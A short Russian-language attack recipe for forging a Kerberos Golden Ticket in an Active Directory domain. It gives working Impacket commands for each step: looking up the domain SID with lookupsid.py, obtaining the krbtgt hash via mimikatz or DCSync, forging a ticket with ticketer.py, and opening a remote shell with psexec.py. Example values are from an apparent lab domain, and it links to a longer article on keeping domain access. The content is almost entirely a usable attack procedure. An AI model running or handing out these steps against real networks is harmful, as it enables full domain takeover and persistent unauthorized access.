Рецепт создания Golden Ticket'a
sudo python3 lookupsid.py DOMAIN.local/user:passwd@DCIP
sudo python3 lookupsid.py MARVEL.local/pparker:[email protected]
У меня S-1-5-21-2456532762-888422967-2018005161
Учетка может быть любая, с малыми правами или без нету разницы.
2. Получим NTLM hash от krbtgt
Можете это сделать через mimikatz/DCSync/meterpreter
Мой хэш: 126aa2cf8f1ae103b0d3c0b2b3b5b2db
python ticketer.py -nthash <krbtgt> -domain-sid <SID> -domain <DOMAIN.local> <ИМЯ_НОВОЙ_УЧЕТКИ>
python ticketer.py -nthash 126aa2cf8f1ae103b0d3c0b2b3b5b2db -domain-sid S-1-5-21-2456532762-888422967-2018005161 -domain MARVEL.local lol
python3 psexec.py -dc-ip <DCIP> -target-ip <ИП_ЖЕРТВЫ_ПК> -no-pass -k ДОМЕН/НОВАЯ_УЧЕТКА@ИМЯ_КОМПА
python3 psexec.py -dc-ip 192.168.63.137 -target-ip 192.168.63.137 -no-pass -k MARVEL.local/[email protected]
Более детальная статья об этом - https://telegra.ph/Haker---Zakreplyaemsya-v-Active-Directory-Kak-sohranit-dostup-pri-atake-na-domen-07-26